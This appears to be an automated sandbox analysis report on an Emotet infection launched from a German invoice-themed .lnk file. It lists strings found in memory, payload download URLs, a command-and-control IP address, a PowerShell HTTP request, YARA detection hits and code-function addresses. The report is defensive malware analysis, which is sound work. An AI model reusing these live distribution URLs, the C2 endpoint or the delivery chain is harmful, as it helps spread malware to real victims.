                    Source: powershell.exe, 00000002.00000002.481052167.000001AFF90D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
                    Source: svchost.exe, 00000008.00000002.705634102.000001F197E85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704616242.0000027EE36EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: regsvr32.exe, 00000004.00000003.527929794.000000000063D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704460917.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enb
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digitalkitchen.jp/images/PVn/
                    Source: svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                    Source: powershell.exe, 00000002.00000002.478180056.000001AFE1AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsonsintl.com
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
                    Source: powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/
                    Source: powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/ity.
                    Source: powershell.exe, 00000002.00000002.461186935.000001AFE0EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000002.00000002.478143569.000001AFE1AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.478180056.000001AFE1AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.478143569.000001AFE1AD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
                    Source: powershell.exe, 00000002.00000002.478143569.000001AFE1AD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.comx
                    Source: regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                    Source: regsvr32.exe, 00000004.00000002.704197704.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/hU
                    Source: regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                    Source: regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/s64
                    Source: regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/tem
                    Source: powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                    Source: powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.479789071.000001AFE2077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nakharinitwebhosting.com/HSDYKN1X5GLF/
                    Source: powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: svchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                    Source: svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                    Source: svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                    Source: svchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                    Source: svchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                    Source: svchost.exe, 00000012.00000003.699317061.0000027EE418B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                    Source: svchost.exe, 00000012.00000003.699274936.0000027EE41B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699365782.0000027EE419C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699248886.0000027EE41B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699317061.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699433667.0000027EE4602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                    Source: unknownDNS traffic detected: queries for: www.jsonsintl.com
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24 InternetReadFile,4_2_0000000180006B24
                    Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive

                    E-Banking Fraud

                    barindex
                    Yara detected Emotet
                    Source: Yara matchFile source: 3.2.regsvr32.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1e40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1e40000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: RechnungsDetails 2022.20.05_1044.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                    Source: RechnungsDetails 2022.20.05_1044.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
                    Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\ZrCipB\Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9F1B91EE02_2_00007FF9F1B91EE0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA524612B03_2_00007FFA524612B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA524653FB3_2_00007FFA524653FB
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52465CAD3_2_00007FFA52465CAD
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA524668503_2_00007FFA52466850
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA5246443C3_2_00007FFA5246443C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52465E013_2_00007FFA52465E01
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52464A703_2_00007FFA52464A70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_009500003_2_00950000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800064143_2_0000000180006414
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C743_2_0000000180005C74
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002ACE83_2_000000018002ACE8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800241043_2_0000000180024104
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000359C3_2_000000018000359C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E99C3_2_000000018000E99C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800196283_2_0000000180019628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025A9D3_2_0000000180025A9D
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B7B23_2_000000018002B7B2
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800094083_2_0000000180009408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023C143_2_0000000180023C14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002582C3_2_000000018002582C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8343_2_000000018000B834
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000403C3_2_000000018000403C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800214443_2_0000000180021444
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800120443_2_0000000180012044
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160543_2_0000000180016054
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001705C3_2_000000018001705C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800018703_2_0000000180001870
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F8783_2_000000018001F878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800144843_2_0000000180014484
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800154943_2_0000000180015494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC983_2_000000018000BC98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008C9C3_2_0000000180008C9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800078A43_2_00000001800078A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F0A83_2_000000018001F0A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E4AC3_2_000000018001E4AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800048B03_2_00000001800048B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ACB43_2_000000018001ACB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800090B43_2_00000001800090B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800270C03_2_00000001800270C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800024C03_2_00000001800024C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800280C83_2_00000001800280C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800050D43_2_00000001800050D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800234D83_2_00000001800234D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800150F03_2_00000001800150F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800125003_2_0000000180012500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A10C3_2_000000018001A10C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D103_2_0000000180028D10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800201183_2_0000000180020118
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A5243_2_000000018001A524
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002D283_2_0000000180002D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E1303_2_000000018000E130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800291343_2_0000000180029134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800081343_2_0000000180008134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800221403_2_0000000180022140
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800069543_2_0000000180006954
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F5543_2_000000018000F554
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B5643_2_000000018002B564
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800121683_2_0000000180012168
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135683_2_0000000180013568
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800245703_2_0000000180024570
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800191783_2_0000000180019178
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800251803_2_0000000180025180
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800019803_2_0000000180001980
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800215883_2_0000000180021588
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A9883_2_000000018001A988
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800181903_2_0000000180018190
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800139943_2_0000000180013994
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800289983_2_0000000180028998
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800061A03_2_00000001800061A0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135A63_2_00000001800135A6
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016DA83_2_0000000180016DA8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800059AC3_2_00000001800059AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135B43_2_00000001800135B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001C1B83_2_000000018001C1B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800025B83_2_00000001800025B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085BC3_2_00000001800085BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800015C03_2_00000001800015C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800295C83_2_00000001800295C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800229CC3_2_00000001800229CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E5D43_2_000000018000E5D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A5D83_2_000000018002A5D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800261E03_2_00000001800261E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800079EC3_2_00000001800079EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800236243_2_0000000180023624
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800186283_2_0000000180018628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017E2C3_2_0000000180017E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800176383_2_0000000180017638
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004E3C3_2_0000000180004E3C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020E403_2_0000000180020E40
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015A643_2_0000000180015A64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800152643_2_0000000180015264
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A26C3_2_000000018000A26C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800076783_2_0000000180007678
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001667C3_2_000000018001667C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800126803_2_0000000180012680
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001E883_2_0000000180001E88
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000968C3_2_000000018000968C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800222903_2_0000000180022290
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A903_2_0000000180026A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000529C3_2_000000018000529C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020AA03_2_0000000180020AA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022AAC3_2_0000000180022AAC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007EB43_2_0000000180007EB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800162BC3_2_00000001800162BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800252C03_2_00000001800252C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AEC83_2_000000018001AEC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F6DC3_2_000000018001F6DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800026DC3_2_00000001800026DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002ADC3_2_0000000180002ADC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E2F43_2_000000018001E2F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016AF43_2_0000000180016AF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DEF43_2_000000018000DEF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DEFC3_2_000000018001DEFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800063083_2_0000000180006308
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001370C3_2_000000018001370C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004B183_2_0000000180004B18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015F243_2_0000000180015F24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006B243_2_0000000180006B24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F3283_2_000000018000F328
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800217383_2_0000000180021738
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AF383_2_000000018002AF38
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800283483_2_0000000180028348
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DB4C3_2_000000018000DB4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014F503_2_0000000180014F50
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B3503_2_000000018000B350
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A7583_2_000000018000A758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002975C3_2_000000018002975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800243703_2_0000000180024370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800083703_2_0000000180008370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800157743_2_0000000180015774
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800123783_2_0000000180012378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026B983_2_0000000180026B98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CF9C3_2_000000018001CF9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001EBA03_2_000000018001EBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3A43_2_000000018001B3A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D7AC3_2_000000018000D7AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800053B03_2_00000001800053B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015BB83_2_0000000180015BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800207BC3_2_00000001800207BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FFC03_2_000000018000FFC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800173DC3_2_00000001800173DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018BDC3_2_0000000180018BDC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_005700004_2_00570000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064144_2_0000000180006414
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C8194_2_000000018000C819
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800196284_2_0000000180019628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025A4C4_2_0000000180025A4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800128644_2_0000000180012864
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005C744_2_0000000180005C74
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B04_2_00000001800248B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800252C04_2_00000001800252C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800241044_2_0000000180024104
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B244_2_0000000180006B24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C4_2_0000000180006F2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A7584_2_000000018000A758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800245704_2_0000000180024570
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E99C4_2_000000018000E99C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3A44_2_000000018001B3A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800079EC4_2_00000001800079EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800094084_2_0000000180009408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023C144_2_0000000180023C14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800236244_2_0000000180023624
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800186284_2_0000000180018628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002582C4_2_000000018002582C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017E2C4_2_0000000180017E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B8344_2_000000018000B834
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800176384_2_0000000180017638
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000403C4_2_000000018000403C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004E3C4_2_0000000180004E3C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020E404_2_0000000180020E40
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800214444_2_0000000180021444
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800120444_2_0000000180012044
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800160544_2_0000000180016054
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001705C4_2_000000018001705C
